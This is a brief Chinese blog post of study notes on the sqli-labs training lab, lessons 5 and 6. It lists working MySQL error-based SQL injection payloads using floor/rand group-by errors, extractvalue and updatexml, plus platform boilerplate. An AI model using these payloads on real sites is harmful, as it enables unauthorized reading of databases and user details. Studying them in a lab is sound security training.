sqli-lab less-5、6 Double Query

利用報(bào)錯(cuò)注入,mysql5.6以上有三種
第一種 利用floor構(gòu)造重復(fù)鍵group by報(bào)錯(cuò)
輸出字符長度限制為64個(gè)字符

?id=1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

第二種 updatexml和extractvalue 基于 ~ 符號報(bào)錯(cuò)
注意的是這種最多能報(bào)32位長度,如果有更多位數(shù)請使用字符串截取函數(shù)

?id=1' and (extractvalue(1,concat(0x7e,(select user()),0x7e))) --+
?id=1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) --+
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 基于錯(cuò)誤_POST_更新查詢注入 我討厭這個(gè)錯(cuò)誤回顯。 這一關(guān)有很多不同的解法,我們將依次分析(這篇看上去會很長)...
    Hyafinthus閱讀 4,277評論 7 12
  • 最近兩周刷了一下sqli-labs,對sql注入有了一個(gè)基本的認(rèn)識。這里寫個(gè)總結(jié)。 1.sql注入原理簡單介紹在一...
    jun123123閱讀 1,429評論 1 3
  • 普通的sql注入大致可以通過在提交框中輸入單引號、雙引號和括號等看網(wǎng)頁的返回內(nèi)容來判斷,但有很多網(wǎng)站并不會將一些敏...
    淺笑清歡閱讀 2,255評論 2 4
  • lesson1: 插入單引號報(bào)錯(cuò) id被單引號包裹,確認(rèn)字段數(shù) ?id=1' order by 3--+ 字段為3...
    A_XiaoBiao閱讀 906評論 0 5
  • 昨天只記得發(fā)微信公眾號了,sorry~以下是正文: (8) 泰戈?duì)栐模?Her wistful face hau...
    語熙閱讀 1,284評論 0 0

友情鏈接更多精彩內(nèi)容